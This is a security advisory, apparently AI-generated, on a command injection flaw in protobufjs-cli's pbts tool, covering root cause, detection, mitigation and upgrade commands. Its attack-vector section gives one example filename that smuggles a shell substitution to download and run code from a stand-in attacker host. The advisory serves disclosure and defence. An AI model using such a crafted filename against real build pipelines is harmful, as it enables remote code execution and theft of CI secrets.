CVE-2026-42290 Overview
CVE-2026-42290 is a command injection vulnerability [CWE-78] in protobufjs-cli, the command line add-on for protobuf.js. The pbts tool builds a shell command string from input file paths and executes it through child_process.exec to invoke JSDoc. File paths containing shell metacharacters are interpreted by the shell rather than passed to JSDoc as plain arguments. Attackers who can influence file paths processed by pbts can execute arbitrary commands in the context of the invoking user. The issue is fixed in versions 1.2.1 and 2.0.2.
Critical Impact
Untrusted file paths passed to pbts can trigger arbitrary shell command execution with confidentiality, integrity, and availability impact.
Affected Products
- protobufjs-cli versions prior to 1.2.1 (1.x branch)
- protobufjs-cli versions prior to 2.0.2 (2.x branch)
- Build pipelines and tooling that invoke pbts with externally influenced file paths
Discovery Timeline
- 2026-05-13 - CVE-2026-42290 published to the National Vulnerability Database (NVD)
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-42290
Vulnerability Analysis
The pbts utility generates TypeScript definitions from protobuf.js modules by delegating documentation extraction to JSDoc. To invoke JSDoc, pbts concatenates user-supplied input file paths into a single shell command string and passes that string to child_process.exec. Because exec spawns /bin/sh -c <command>, any shell metacharacter present in a path is interpreted by the shell. Characters such as `, $(), ;, &, |, and > allow command substitution, chaining, or redirection. An attacker who controls or partially controls a file path argument can therefore execute arbitrary commands with the privileges of the user running pbts.
Root Cause
The root cause is unsafe construction of an operating system command. The CLI builds a command string from untrusted input and routes it through a shell interpreter instead of invoking the JSDoc binary directly with an argument array. This is a textbook instance of OS Command Injection [CWE-78], where data and command syntax share the same channel without sanitization or escaping.
Attack Vector
Exploitation requires local access and user interaction, consistent with the CVSS vector AV:L/AC:L/PR:N/UI:R. A typical scenario involves a developer or CI job that runs pbts against a repository containing attacker-influenced filenames, an autogenerated path, or a directory glob that resolves to a crafted name. A filename such as evil$(curl attacker.example/x|sh).proto is interpreted by the shell during exec, triggering the injected substitution. Because attackers can stage malicious filenames in dependencies, pull requests, or artifact archives, the practical attack surface includes any automated build that processes external .proto inputs.
No verified public exploit code is available. See the GitHub Security Advisory GHSA-f84p-cvgm-xgjj for vendor analysis.
Detection Methods for CVE-2026-42290
Indicators of Compromise
- Unexpected child processes spawned by node or pbts invoking /bin/sh -c with concatenated file path arguments
- Outbound network connections from CI build agents shortly after pbts execution against untrusted sources
- Filesystem artifacts containing shell metacharacters such as `, $(, ;, &, or | in .proto or related input file names
Detection Strategies
- Inventory installed protobufjs-cli versions across developer workstations and CI runners and flag installations below 1.2.1 or 2.0.2
- Hunt process trees where node or pbts is the parent of sh -c followed by JSDoc invocation, and inspect the command line for non-alphanumeric characters in path positions
- Review source control history for filenames containing shell metacharacters introduced through pull requests or third-party archives
Monitoring Recommendations
- Enable process command line auditing on build hosts and forward events to centralized logging for retrospective analysis
- Alert on pbts or protobuf.js build steps that produce unexpected outbound network traffic or modify files outside the build workspace
- Track package manifest changes that pin protobufjs-cli to versions older than the patched releases
How to Mitigate CVE-2026-42290
Immediate Actions Required
- Upgrade protobufjs-cli to 1.2.1 for the 1.x branch or 2.0.2 for the 2.x branch across all developer and CI environments
- Audit build pipelines that invoke pbts against externally sourced .proto files and quarantine any inputs containing shell metacharacters
- Rotate any secrets accessible to build agents that processed untrusted .proto inputs while running a vulnerable pbts version
Patch Information
The maintainers fixed the issue in protobufjs-cli1.2.1 and 2.0.2 by changing how pbts invokes JSDoc so that file paths are passed as arguments rather than concatenated into a shell command string. Details are published in the GitHub Security Advisory GHSA-f84p-cvgm-xgjj.
Workarounds
- Restrict pbts execution to trusted file paths under developer-controlled directories until patching is complete
- Validate input filenames against an allowlist of safe characters such as [A-Za-z0-9_./-] before passing them to pbts
- Run pbts inside a sandbox or container with no network egress and minimal filesystem privileges to contain potential command execution
# Configuration example
npm install --save-dev protobufjs-cli@^2.0.2
# Or for the 1.x branch:
npm install --save-dev protobufjs-cli@^1.2.1
# Verify installed version
npx pbts --version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
